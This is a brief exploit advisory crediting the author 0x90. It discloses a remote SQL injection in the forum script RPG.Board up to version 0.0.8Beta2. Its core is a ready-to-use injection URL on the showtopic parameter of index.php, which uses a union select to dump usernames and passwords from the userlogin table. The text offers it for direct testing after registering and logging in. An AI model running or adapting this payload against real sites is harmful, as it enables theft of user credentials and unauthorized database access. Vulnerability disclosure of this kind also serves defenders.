[~] RPG.Board <= 0.0.8Beta2 Remote SQL Injection
[~] Author: 0x90 [~] HomePage: www.0x90.com.ar [~] Contact: Guns[at]0x90[dot]com[dot]ar [~] Script: RPG.Board [~] site: http://rpgmaster.de/viewtopic.php?f=25&t=69 [~] Vulnerability Class: SQL Injection [~] Exploit: Register, login and testing exploit.. http://host/index.php?subtopic&showtopic=-0x90+union+select+null,null,null,concat(user,0x3a,pw),null+from+[PREFIX]_userlogin
